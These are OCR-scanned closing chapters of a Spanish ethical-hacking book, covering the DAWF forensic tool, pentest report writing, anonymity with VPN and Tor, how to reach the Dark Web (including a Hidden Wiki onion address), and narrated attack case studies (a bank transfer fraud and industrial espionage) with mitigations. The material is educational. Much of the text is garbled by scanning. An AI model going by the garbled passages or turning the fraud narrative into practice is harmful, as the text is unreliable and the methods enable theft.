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En esta carpeta, la herramienta DAWF, que es la 
que automatiza las funciones, es el ejecutable, y la 
carpeta de herramientas son las herramientas 
reales que DAWF está utilizando para automatizar, 
en la carpeta de “evidencias” es donde se 
guardaran nuestros resultados. 

Para iniciar la herramienta, ejecuta DAWF como 
administrador, y vamos a ponerle *Iniciar”, y 


esperemos un poco a que haya terminado de 


recopilar la información. 





Al terminar el proceso, aparecerá una ventana 
avisando de ello, así como donde guardo lo 


encontrado. 
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Pro 


| DAWF ha Finalizado y se Cerrará 


Revisa los archivos generados en la siguiente ruta C:\Users\WhiteSuit 


? Hacking\Downloads\DAWF\Evidencia\WIN-KASNAUTJLSB-194732-my 
erto 





Ahora, dentro de la carpeta “evidencias”, 


entraremos a la carpeta nueva que creo DAWF , en 


donde veras algo parecido a esto. 

















Passwords Informe-WIN-KA 


«Sistema egadores chivos ial 6NAUTILSB 


Aqui dentro de las categorias podremos ver 
informacion de registros y uso de la maquina, no 
tiene sentido ir por cada uno de los archivos que 
genera DAWF, pero el uso es el mismo, entra a la 


carpeta de la categoría, digamos que queremos ver 
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lo que se ha hecho en la máquina, entraremos a la 


AAOC COCA 
Y Y Y Y Y 


primera ae 






















Ahora abriremos como ejemplo, el archivo de 
“ExecutedProgramList”, que nos dirá todos los 


programas que han sido ejecutados en la máquina, 





todos estos archivos están en HTML, así que 





podemos abrirlos con cualquier navegador. 


Dentro del archivo verás en una tabla los 





programas que han sido ejecutados, fechas, 





usuarios, y ubicaciones, y en los demás archivos 





hay otro tipo de información que podría ayudarte 





desde a detectar mal uso del sistema, hasta 






maneras en las que hubo una intrusión. 


Executed Programs List 










Created by axing ExerptedProgramal it 
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Executed File Ai eid | File Created On [En in Ñ ‘ | Prodsct Name 
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Prey! 


Reportaje 


El trabajar como hacker profesional requiere 
muchas habilidades técnicas, de resolucion de 
problemas, entre otras cosas, pero una de las 
cosas que a casi ningún hacker profesional nos 
gusta, es la parte final de cualquier trabajo, el 
reporte. 

Tenemos que recordar que aunque un servicio de 
ciberseguridad es altamente valioso, no 
producimos ni creamos nada realmente, solo 
auditamos, entonces nuestro entregable y prueba 
de trabajo para nuestros clientes, es el cómo 
reportamos el trabajo que hemos realizado, así 
como la metodología que utilizamos que es una de 
las habilidades más importantes que un profesional 
de ciberseguridad debe tener, además, es un 
hecho que a pesar que hay cientos de libros de 
pentesting y ataques, cientos de miles de horas de 
entrenamiento para esto, y varios centros de 
capacitación, podría apostar que menos del 10% 


del material está dedicado a la etapa del reporte. 
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SIENA 


Tanto este libro, como nuestras capacitaciones, 
están diseñadas no solo para entrenarte como 
hacker, si no para que puedas utilizar tus 
conocimientos en un uso profesional así que esta 


es una etapa que no debes ignorar. 


Metodología 


A pesar de que hay varias menciones de 
metodologías para reportar, no hay tal cosa como 
una sola centralizada y única para reportar, 
podemos decir que generalmente hablando todos 
los hackers profesionales seguimos la metodología 
de prueba de penetración, pero el tema de reporte 
es relativamente subjetivo, sin embargo, hay 


algunos puntos que deben ser adecuadamente 
explicados al cliente. 


En la mayoría de las consultorías, se entregan dos 
reportes en una prueba de penetración o auditoría, 
el primero, llamado el reporte ejecutivo, está 


diseñado para un director o ejecutivo de la 
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empresa, no un experto en seguridad, y el 
segundo, llamado el reporte técnico, es para el 
jefe o experto en seguridad o sistemas, y menciona 
todos los detalles técnicos de la metodología y las 
recomendaciones técnicas de cómo mejorar el 


nivel de ciberseguridad. 


Reporte Ejecutivo 


El reporte ejecutivo, como mencionaba, no es para 
el experto en seguridad, es para el ejecutivo o 
director de empresa que no tiene conocimientos o 
interés en los detalles técnicos del estado de 
seguridad de su organización, a esta persona le 
interesa conocer el estado general de la situación, 
y el cómo y en cuanto tiempo se va a remediar los 
problemas, recuerda, a pesar de que la profesión 
de ciberseguridad es una profesión técnica, la 
razón por la que existe es para proteger los activos 
tangibles e intangibles, (es decir, dinero) de una 
organización, así que a los tomadores de 
decisiones debes de traducir la inversión que se le 


hizo para mejorar su seguridad en cosas tangibles, 
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como “si hubiera pasado esto, hubieras perdido x 
cantidad de dinero”, o “si x ataque sucediera, se 


detendrá la operación de la empresa x tiempo”. 


Tomando esto en cuenta, lo principal que sugiero 
incluido en un reporte ejecutivo es lo siguiente, 
toma en cuenta que esto generalmente se presenta 
más en gráficas y tablas que en detalles técnicos: 
1. El contexto: Esto se refiere a el objetivo de la 
auditoria, activos que se auditaron, tiempo, etc. 

2. Resultados/conclusiones: En esta sección se 
debe de hablar de la efectividad del pentester 
en llegar a los objetivos que se establecieron, 
en términos generales, se comprometió algún 
sistema, o ninguno, o algunos en cierta medida, 
etc. 

3. Ranking de riesgo: Aunque un análisis de 
riesgo completo es otro tema completamente 
diferente, es recomendable dar un valor 
numérico del nivel de riesgo que presenta la 
organización, es relativamente subjetivo, pero 


esto es tomando en cuenta si las 
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vulnerabilidades encontradas son críticas o no, 
y si están en un sistema importante o no, una 
forma de hacer esto es catalogar el nivel de 
riesgo organizacional general, y por áreas, por 
ejemplo, esto se puede dividir por 
departamentos o por activos (digamos, si sus 
sistemas son seguros, pero su personal está 
mal entrenado, entonces tienen bajo riesgo en 
el sistema pero alto en el personal, entonces la 
mitigación debe de enfocarse a entrenamiento 


más que inversión en infraestructura). 








Information Security Risk Rating Scale 


* Extreme risk of security controls being compromised with 
the possibility of catastrophic financial losses occurring as 
aresult 


ys . ; z di Us T ` 
HioH * High risk of security controls being compromised with the 
HA, EN potential for significant financial losses occurring as a 
ON result 


E | t d * Elevated risk of security controls being compromised with 
evate th If | fi | 
e potential for material financial losses occurring as a 
result 


7-9 












* Moderate risk of security controls being compromised with 
the possibility of limited financial losses occurring asa 
result 


ff * Low risk of security controls being compromised with 
| measurable negative impacts asa result 
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4. Encuentros generales: Aquí es un resumen de 
lo que se encontró o los errores principales, por 
ejemplo, si la mayoría de los errores fueron a 
base de falta de entrenamiento, o falta de 


actualización, o de la red, etc, generalmente 


esto se presenta en una tabla o gráfica. 


security Risk Origin/Category 
& Missing Patch 


@ Lack of Application 
Hardening 


@ Lack of OS Hardening 


m Easily guessable 
credentials 


2 Network Design Flaw 





5. Resumen de recomendaciones: En este 
apartado se menciona las recomendaciones 
como experto para elevar el nivel de seguridad, 

que cosas son prioridad, que cosas no, y como 

se podría resolver, recuerda, el trabajo del 


pentester no es asegurar, ese es un trabajo 
adicional. 
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6. Plan de acción: Esto es relativo a la 


i 


organización, pero un plan de acción pone 
acciones en concreto que recomiendes como 
experto para que se eleve el nivel de seguridad 
empresarial, y plazos específicos en los que 


debería de cumplirse ciertas metas. 





Completed at the time of this assessment 
Tasks RO E Se 
identify internal security point of contact 
» Identify current resources todedcstethe task af resolving security concems within the environment, The 
remediation process should be owned and supported byseniorstaffin arder to effectvely manage ds completion. | 


+ Secure appropiate funding for initial program review and 2” partyassessment 


Identity Current Security State of security 
+ This task wil be performed atan executive level. CLIENT wa identifythe proper ownership and executive support | 
channel tocharepion this effort. In addition, CLIENT wil need to fake inventory of the “Secunty MansgementCnsin 

of Command”, Policy, Procedure, and Complisnce tracking sophisti y 





One (1) to Three (3) Months — 





“Tasks F 
| Create Remediation Strategy 

| Leverage results found within the Penetaton Testtocreates ful remediation siralegy 

is action. li must now be formalized and approved by the 





» This assessmentrepot wil provide thebsss for th 

i a CLIENT Seounty Team. d Ñ e 
Create Information Security Council/Task Force 

® Togain better traction in {he remediation and seaumy onboarding process, CLIENT should create a specific ISEC | 
counci to aid in remediation and adequately invo've each ndividusiteam. | 

« Tneosuncishouid consist of Management ofeach individual businessunit | 








. sab 
| Begin Security Projectplanning 
® Assign Executive owners of security for CLIENT 
. rr 
| Prioritize Remediation Events 
e Leverage results found within Penetrafon Test iogainundestanding of the tasks needed tobe peformedin order | 
io resolve the nsks identfied. i 
e Assign prionty isting to remedation tasks thatw 
identifed nsk, 
| e Sten process with server pstohnato asin 
: Patch Services 
+ Specific things to be fixed/how... 








a provide the hignesi level ofimpect and largest reduction of 





quick increases in environment SU”, Eze 





| Harden Servers _ 
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Reporte Técnico 






Esta sección no va dirigida a los ejecutivos, si no a 





los programadores, o ingenieros de sistemas, aquí 





es donde deberás ser tan detallado y técnico como 





sea posible, lo importante aquí es la narrativa del 





ataque, que es donde redactas la metodología, con 





capturas de pantalla y detalles de las herramientas 







y comandos utilizados, como obtuviste acceso a los 


recursos de la organización, para esto vas a 





redactar la metodología que has aprendido a lo 





largo de este libro. 





Partes de un reporte técnico: 





1. Introducción: En la sección de introducción 






deberás reportar el inventario inicial del ataque, 





que puede ser cosas como el personal 





involucrado, la información de contacto, el 








alcance de activos involucrados, el objetivo, y la 





estrategia. 





2. Reconocimiento: deberás documentar todas 





las técnicas de reconocimiento, herramientas, y 
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comandos que hayas utilizado para obtener 


información para realizar el ataque. 


. Análisis de vulnerabilidades: Documentar 


todo lo que se utilizó y lo que se obtuvo en esta 


fase del pentest. 


. Explotación: Documentar todo lo que se utilizó 


y lo que se obtuvo en esta fase del pentest. 


. Post- Explotación: Documentar todo lo que se 


utilizó y lo que se obtuvo en esta fase del 


pentest. 


. Riesgo: En este punto la meta es darle al 


cliente la habilidad de identificar, visualizar y 
mitigar las vulnerabilidades encontradas, así 
que aquí deberás cubrir los incidentes en los 
que fueron comprometidos los recursos, que tan 
probable es que sucedan, el grado de magnitud 
que representa, y las pérdidas posibles que 
ocasiona un ataque real si el riesgo no es 


mitigado. 


. Conclusión: Finalmente, un resumen del 


pentest, plan de acción y recomendaciones 
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para mejorar el nivel de seguridad de la 


organización. | 


Estas son las bases para realizar reportes 
profesionales, aun sugiero que visites la pagina de 
pentest-standard para leer un poco al respecto 
http://www.pentest- 
standard.org/index.php/Reporting asi como ver 


los ejemplos de reportes que subi en 


https://whitesuithacking.com/material-libro. 
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Anonimato, Dark Web y Deep 
Web 


Estos temas se han vuelto de más interés últimamente, 
pero realmente poca gente entiende cómo funciona y 
que es la Deep web y Dark web, adicionalmente, cada 
vez más gente es consciente de su privacidad debido al 
constante espionaje a nosotros que existe de parte del 
gobierno y las grandes corporaciones, así que en este 
capítulo hablemos algo del tema, a este punto ya no es 
necesario utilizar Kali Linux, y todo esto es compatible 


con Windows, Macintosh y Linux. 


Anonimato 


Antes de poder tener anonimato en la red, tenemos que 

entender cómo es que nos rastrean en la red y obtienen 

información nuestra, la forma en la que somos 

rastreados principalmente involucra a los siguientes 

factores: 

1. Dirección IP y routers - Este es el primer 
factor que se utiliza para rastrear a una 


persona, ya que fácilmente con la IP podemos 
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obtener la ubicación aproximada de una 
persona, su proveedor de internet, y por ese 
medio podríamos hacer escaneos que nos den 
más información, ya que nos podría permitir una 
comunicación con el router. 

Adicionalmente, algo poco conocido pero real, 
es el hecho que a pesar que para un atacante la 
IP le da información de una ubicación 
aproximada, compañías como Apple y Google 
saben exactamente tu ubicación, debido a que 
los sistemas operativos de los celulares, al 
conectarse a un nuevo router, secretamente le 
mandan información de ubicación GPS a la 
compañía dueña del sistema (iOS-Apple, 
Android-Google), por lo que actualmente son de 
las compañías que potencialmente más 
información tienen de todos nosotros, Google 
tiene un formulario para solicitar que se borre o 
no se grabe más información de este tipo, sin 
embargo, Apple al momento que estoy 


escribiendo esto, no tiene tal herramienta. 








Ar] 


2. Cookies - Este es el factor por el cual 


compañías como Facebook, Google y Amazon 
“mágicamente” saben en qué productos 
estamos interesados, que paginas visitamos, y 
mucha más información nuestra, esto es 
gracias a las sesiones que guardan las 
“cookies” de los navegadores, que permiten 
rastrearte incluso cuando sales de las páginas 
de estas compañías. Por esta razón, Google 
sabe que estás haciendo incluso si no estás en 
una página de Google, igual que Facebook, 


Amazon y Microsoft. 


Redes - Un atacante, como ya hemos 
mencionado en el libro, podría saber lo que 
estás haciendo si intercepta información que 
mandas dentro de una red privada, es cierto 
que con encriptación punta a punta difícilmente 
van a poder espiar la información que mandas 
por ese canal, sin embargo, hay otra clase de 
información no encriptada que mandas, como 


tus peticiones DNS (que dicen a qué página 


543 








WHITE SUIT 


| N G 


estas entrando), tu direccion MAC (que dice el 
nombre de tu fabricante), y potencialmente los 


servicios que utilizas. 


. Otros - Existen otros factores que pueden 
ayudar a una compañía u atacante a rastrarte, 
por ejemplo tu hardware (direccion MAC), tu 
sistema operativo, tu navegador, tu historial, tus 
búsquedas en Google u hábitos de navegación 
(por ejemplo las aerolíneas las utilizan para 
segmentar precios). 

Y si te pones más estricto, hasta las antena 
telefónicas y las cámaras de seguridad en la 
calle pueden ser utilizadas para rastrear 
personas, sin embargo probablemente no tienes 
que preocuparte de esto mientras no seas 
buscado por una instancia gubernamental o 


militar. 






bloquear todos esos factores, sin embargo, en 


realidad no es muy complicado. 


Empecemos por lo más básico, un VPN, un VPN 
bueno va a hacer dos cosas muy importantes, 
primero, va a encriptar el canal de 
comunicación, de forma que a pesar que estas 
conectado por tu router normal, todo el tráfico va a 
pasar por un “tunel” encriptado directamente al 
servidor VPN, y desde este servidor VPN vas a 
acceder al internet, esto encripta tu canal de 
comunicación de forma que si algún atacante 
intercepta las redes en tu LAN, no va a poder ver 
absolutamente nada, adicionalmente, va a 
esconder tu proveedor de internet (ISP), tu 
información de este, y tu IP, haciendo difícil que 
alguien te rastree por tu IP o por tu red o ISP. 
Hay una debilidad, sin embargo, deberías de 


investigar la VPN que utilices, ya que esta VPN si 
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Ahora que entiendes algunas de las cosas que 


utilizan para rastrearte, veamos cómo protegerte, a tendrá acceso a toda la información que 


primera instancia puede sonar un poco complicado normalmente tu ISP y Router verían, y si la 


compañía elige, podría utilizar tu información de 
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forma indebida, o compartirla con gobiernos, 
empresas o ISPs para rastreo, así que vale la pena 
investigar a los dueños de una empresa VPN, y sus 
políticas de privacidad, por ejemplo, cuando 
TunnelBear(una empresa de origen Canadiense) 
fue comprada por Mcafee, una empresa 
americana, algunos usuarios dejaron de utilizar el 
servicio debido a que al tener que acatar las leyes 
americanas con la compra, potencialmente 
tendrían que darle al gobierno americano datos de 


sus usuarios. 


EN 


VPN Server 


Encrypted VPN “Tunnel” 


| Normal Connection i 8 
PA (No VPN) a 


æ The Internet 






Ahora, una VPN ciertamente ayudara mucho a tu 
privacidad, sin embargo, si realizas búsquedas, 


incluso con navegadores “incognitos” como el de 


546 














PPA 


Chrome, vas a ser rastreado por medio de las 
sesiones, así que una solución sencilla es en las 
búsquedas utilizar buscadores como 
DuckDuckGo, que asegura no rastrar a sus 
usuarios, y no dar búsquedas ni publicidad 


personalizadas por lo mismo. 


Sin embargo, si quieres ser realmente anónimo en 
la red usando tú mismo sistema operativo, una de 
tus mejores opciones es utilizar TOR, un 
navegador que puedes instalar entrando en la 
página https://www.torproject.org/. Este 
navegador tiene algunas características especiales, 
la primera, es que, utilizando la tecnología de TOR, 
te conecta al internet por medio de proxychains, lo 
cual esencialmente te conecta al internet a través 
de otro sistema, que está conectado a otro sistema, 
de forma que se vuelve difícil para una 
organización u atacante, rastrearte, 
adicionalmente, TOR por defecto no guarda 


cookies, y el buscador por defecto es 


547 














WHITE 


DuckDuckGo, así que es el navegador perfecto 
para anonimato. 

Sin embargo, en TOR hay una diferencia entre 
anonimato y privacidad, ya que a pesar de que la 
tecnología TOR hace un buen trabajo escondiendo 
quién eres y donde estas, no esconde lo que estás 
haciendo, es decir, no encripta la información como 
un VPN. 

Otra funcionalidad de TOR, es que permite acceso 
a los sitios .onion, que son en donde se 


encuentran muchos de los sitios en la Deep/Dark 


Web. 
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Deep Web 8 Dark Web 


Ahora hablemos un poco de la Deep Web y la Dark 
Web, estos conceptos usualmente son causa de 
confusión y morbo, con leyendas sobre redes 
criminales e incluso conspiraciones dentro de estas 


redes, así que empecemos por entender que son 


estos conceptos, y cuál es la diferencia entre estos. 


Deep Web 


Empecemos por la Deep Web, esta es una 
clasificación que se refiere a todo lo que no pueda 
ser encontrado por un motor de búsqueda, y no 
necesariamente significa que es algo que sea 
explícitamente oculto o ilegal, simplemente es una 
limitación de la tecnología de un motor de 
búsqueda, un ejemplo sencillo es una base de 
datos dentro de una página web, por ejemplo algo 
como la base de datos de crímenes en Dakota del 
Norte, 


http://publicsearch.ndcourts.gov/default.aspx 
si intentas encontrar resultados dentro de esta 
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“En 


base de datos por medio de un motor de búsqueda | 
como Google, DuckDuckGo o Bing, no lo lograras, 


entonces por definición esta información pertenece 





a la “Deep Web”, adicionalmente, no necesitas 
nada en especial fuera de un navegador común 
para acceder a un sitio de la “Deep Web”, de 
seguro lo has hecho cientos de veces en 


información dentro de páginas no indexadas. 


Dark Web 


La “Dark Web”, sin embargo, es algo completamente 
diferente, los sitios en la Dark Web son clasificados 
como los que son intencionalmente escondidos e 
inaccesibles a través de navegadores comunes. Los 
sitios de la Dark Web son creados para estar ocultos, 
dentro de aquí la privacidad es primordial, el contenido 
más conocido es el que se encuentra dentro de la red 
TOR, que puedes identificar por la terminación .onion 


de los sitios. 


Esta es la red que es causa de diversas leyendas, 
teorías de conspiración y grupos criminales, y a pesar 


de que esto último si es verdad, existiendo dentro de 
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esta red redes criminales enormes que van desde 


piat 


asesinos a sueldo hasta tráfico de drogas y de 
personas, también existe para combatir la censura en 
países con gobiernos opresores, dando acceso a un 
canal de comunicación seguro y anónimo comúnmente 


utilizado por los medios de comunicación oprimidos. 


í ps ra 
Academic Nntormmaron 2 
1414000 L i Pe Proceedings 


DEER WEB © iman hescurcos 


Medical Regol das 
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Legal Documents _ E Competitor Websites 
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mation Repositorie 
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Como entrar 





Ahora que entiendes que es la Deep Web y la Dark 


Web, seguro te preguntaras en el caso de la Dark 







Web “y como entro a esta red?”, bueno, antes de 


decirte, tengo que mencionarte que es verdad que 






dentro de esta red existen redes enormes de 






criminales y contenido ilegal tal como la 






pornografia infantil, homicidios y trafico de drogas, 







ademas de que existen comunidades de 






cibercriminales en esta red, asi que se prudente al 


entrar a esta red, no por utilizar TOR significa que 






eres 100% irrastreable, ademas que existen 






entidades gubernamentales como el FBI que 






activamente buscan criminales en esta red. 










Ahora, para entrar, requerirás dos cosas: 


1. TOR - El navegador TOR que mencione 






anteriormente, instálalo en tu sistema. 






2. Dirección Onion - Una dirección URL onion, 






ya que como mencionamos anteriormente, 


estas páginas no están indexadas en ningún 
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buscador, por lo cual la única forma de entrar a 

una página de la Dark Web es directamente con 

la URL, o saltando de liga en liga. 
Ahora, una vez que hayas iniciado TOR, una 
sugerencia seria ir a lo que se considera el “inicio” 
de la Dark Web, por ser lo más conocido del tema, 
esta es una página que se llama The Hidden Wiki, 
para entrar aquí, basta con escribir la URL 
http://zgktlwi4fecvo6ri.onion/wiki/index.php/Mai 
n_Page en TOR, y les aparecerá una página que 
tiene un directorio de las páginas más conocidas 


de la Dark Web. 
TACTO EPPS 
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Ahora, lo repito, existen ligas con contenido 
peligroso, criminal y actividades ilicitas, 
recomiendo no entrar, y ser prudente al entrar a 
páginas en esta red, asi como en dar o solicitar 


información. 
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Casos 


En esta sección veremos algunos casos de la vida 
real en la que cibercriminales han atacado 
exitosamente a organizaciones, intenta determinar 
dos cosas mientras los lees: 
1. ¿Qué técnicas pudieron haber utilizado para 
realizar el ataque? 
2. ¿Si tu fueras el jefe de seguridad, qué harías 
para defender de ese tipo de ataques”? 
Ahora, empecemos con los casos. 





*nota: Algunas cosas las estamos asumiendo, ya que no 
tenemos forma de saber a ciencia cierta si paso 


exactamente así, pero están basadas en evidencias 
reales. 


Robo bancario 










Empecemos por uno de los casos más 
interesantes, hace algunos años, se realizó un robo 
bancario por aproximadamente 18 millones de 
pesos mexicanos a un banco mexicano, en el que 
los culpables nunca fueron detenidos, lo siguiente 
lo estamos asumiendo en base al informe forense. 







Para empezar, tenemos que entender el 
fundamento de cómo funcionan los bancos, y, a 
grandes rasgos, existen tres partes de un banco. 

















PO 


1. La sucursal: Aquí es donde verifican la 
información de los clientes, su identidad, y 
reciben y entregan dinero de los clientes. 

2. El corporativo: Aquí es donde se autorizan las 
transferencias, creación de cuentas, envió de 
dinero, créditos, etc. 

3. El sistema: Aquí es donde realmente existe el 

dinero, ya que como todos sabemos, nuestro 

dinero en general no existe, son datos en 
sistemas. 


Ahora que entendemos esto, empecemos con el 
ataque. 

De alguna forma, ¿el grupo delictivo obtuvo acceso 
a la red interna del corporativo, como crees que 
pudo pasar esto? 

La teoría es que paso como pasa en la mayoría de 
los casos, utilizando ingeniería social para obtener 
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acceso a un sistema a través de las personas poco 
entrenadas en ciberseguridad. 

A través de esta red, intentaron acceder el sistema, 
para “agregarse unos ceros de más”, sin embargo, 
esto fue imposible por el nivel de seguridad que se 
tenía en el sistema. 









Así que, los hackers decidieron ahora poner en su 
mira a las personas que trabajan dentro del 
corporativo, analizando su tráfico, y pivoteando 
dentro de la red. ¿Con que herramientas o técnicas 
vistas en el libro podrías hacer esto? 











Después de un tiempo, se dieron cuenta que los 
empleados del corporativo se enviaban entre ellos 
(en la red interna) archivos XML no encriptados, en 
los cuales había información de cuentas, 
transacciones y más información que era la que se 
usaba para hacer solicitudes al sistema. 
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Con esto, los hackers decidieron lentamente crear 
una lista de los clientes más ricos del banco, 
posteriormente, filtraron archivos XML falsos en los 
cuales se solicitaba crear cuentas bancarias a 
nombre de ex convictos de forma que no se 
requiera la verificación usual de la sucursal. 












Luego de esto, simplemente filtraron más archivos 
XML con órdenes de transferencias bancarias, 
haciendo que los mismos empleados empezaran a 
realizar las solicitudes de transferencias, y 
finalmente, solo fue cuestión de mandar a los 
exconvictos a retirar dinero de las sucursales con 
su nombre. 

Así fue como el banco perdió 18 millones. Ahora, si 
tu fueras el CSO, ¿Qué harías para que esto no 
vuelva a pasar? 
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Mitigación 
¿En este caso, cuáles fueron las causas de que el 


ataque fuera exitoso? 
Yo diría que fueron estas principalmente: 


1. Los empleados no estaban bien entrenados 
2. Se enviaban archivos XML sin encriptación 


3. No había una segunda verificación para 
autorizar movimientos, lo cual es una falla en la 
política de seguridad 


Una mitigación obvia seria auditar primero que nada 
los procesos para crear y autorizar movimientos en las 
cuentas, lo cual requiere cambiar la política de 
seguridad empresarial, la segunda, probablemente 
siendo la más importante, sería la capacitación de los 
empleados, lo mas probable es que los hackers 
obtuvieron el primer acceso por una falla humana a 
través de ingeniería social, y al final, el ataque fue 
hecho por las manos de los empleados, así que hubo 
una falla en capacitación. 


POLICIES 








di ale 


Robo a laboratorio farmacéutico 
(espionaje industrial) 


Hace algunos años, cierta empresa de investigación en 
México tuvo un robo en su propiedad intelectual 
(investigaciones). 


En esta empresa, los trabajadores y socios son de clase 
alta en la ciudad más rica del país, y por ello, 
combinado con un poco de arrogancia, evitan el 
contacto con gente de clase baja, por lo que una 
empresa externa administraba su área de RH para 
contrataciones de intendencia y mantenimiento. 


Un día, se contrató a un conserje, que a primera vista 


era una persona de tez y clase humilde, y por esto y lo 
mencionado anteriormente, fue asignado el horario 
nocturno de limpieza. 


Resulta, que esta persona era un espía 
industrial altamente capacitado, y al limpiar 
de noche, y notar que toda la investigación 
de los empleados estaba sobre los 
escritorios, simplemente saco su celular y 
tomo fotos de todo, esto causo pérdidas 
millonarias debido al tipo de material que era 
(investigación). 


¿Qué cambios harías en la empresa para 
evitar este tipo de ataques? 
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Mitigación Filtración de cadena de comida rápida 


¿En este caso, cuáles fueron las causas de que el (espionaje industrial) 
ataque fuera exitoso”? 


vende hamburguesas principalmente, llamémosla 


Los empleados no estaban bien capacitados “K”, realizo una investigación de mercado extensa 
sobre estudiantes, que costo 9 meses y varios 
Tenían mal cadena de seguridad en su proceso | cientos de miles de pesos, pero finalmente llegaron 
de contratación a la conclusión que si vendían su hamburguesa a 
$X precio en cierto horario, venderían muchísimas 
9. No había una adecuada política de seguridad hamburguesas a los universitarios, finalmente 


En este caso, lo primero que se hizo, fue establecer 
una política de “escritorio limpio”, esencialmente 

significa que al terminar el día el escritorio tiene que 
estar limpio, y lo segundo, fue revisar el proceso de 


investigación a la gente que contratan y a las 
subcontrataciones (como el de RH que Sin embargo, un espía industrial que obtuvo la 


subcontrataron). información gracias a la comunicación que se tuvo 
con la imprenta, le vendió la información a empresa 
M, la cual inmediatamente lanzo su promoción, 

Ge ganándole en tiempo a empresa K, y, 

ya efectivamente, en ventas, empresa K también saco 
la promoción, pero al ser después, tuvo menos 
efecto del esperado, y empresa M gasto una 
fracción de recursos para obtener más beneficio. 


ganando mercado contra empresa “M”, entonces 
se tomó la decisión de sacar la promoción y se 
mandó comunicados a la imprenta para los flyers. 





















Esto fue debido a una falla en seguridad de la 
información, ¿qué harías tu para evitar esto? 
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Mitigacion 
¿En este caso, cuáles fueron las causas del problema? 


Yo diría que fueron estas principalmente: 
1. La cadena de comunicación no tenía privacidad 


2. Mala política de seguridad 

















3. Mal tiempo de respuesta 
En este caso la principal causa es obvia, la mala 
cadena de comunicación y política de seguridad cliente- 
proveedor de las empresas, aquí vale la pena aprender 
de Apple, de cómo su cadena de producción, a pesar 
que está en china, exige investigar a cada empleado, y 
tienen prohibido llevar celulares a las fábricas, además 
de que no se le da a ningún área o empleado toda la 
información, de forma que nadie tiene la información 
completa, adicionalmente, el tiempo de respuesta fue 
un factor, que hizo que la competencia tuviera suficiente 
tiempo para robarles la estrategia. 


| The Boss is worried about 

| IT Security, so he sends 

| his messages in one 

dlphaber letter ata time | 
in random sequence. 
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Conclusion 


Asi concluye este libro, espero hayas aprendido 
bastante, y realizado las practicas, si deseas 
probar y aumentar tus conocimientos, en nuestra 


página whitesuithacking.com y 
hackshop.whitesuithacking.com puedes 


encontrar exámenes de certificación, cursos y 
herramientas. 


Como habrás notado a lo largo de este libro, lo más 
importante no fueron las técnicas, si no conocer la 
metodología y estándares para que puedas partir de 
ahí y aprender con una buena base, en los siguientes 
libros, tocaremos temas más especializados 
partiendo de aquí, como ataques todavía más 
peligrosos, temas como informática forense, defensa, 
pentesting a páginas web, entre otras cosas. 





Próximamente publicaremos nuevos libros de hacking 
y otros temas. 


Sin más que agregar, ¡HAPPY HACKING! 


























En este libro, que te lleva de la mano desde los fundamentos 
hasta las técnicas más modernas de ataque, aprenderás 
a convertirte en un hacker profesional, una de las 
profesiones más demandadas 
y mejor pagdas del mundo. 


A pesar de que el enfoque es para uso profesional, se verán 
principalmente técnicas de seguridad ofensiva, es decir, de 
ataque, para que puedas auditar a una organización 
y defenderla de estos tipos de amenazas. 


También podrás encontrar dentro de este libro todas las 
herramientas necesarias que te mostrarán técnicas de 
hacking de forma práctica. Además, este libro te ayuda 
a prepararte para que puedas pasar el exámen de 

Certificación reconocida de ciberseguridad G.H.O.S.T. 

¡Diviértete convirtiendote en el próximo hacker profesional! 


Para encontrar mas información de nosotros, visitanos en 


whitesuithacking.com 
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HACKER PROFESIONAL 
Pablo Gutiérrez Salazar 
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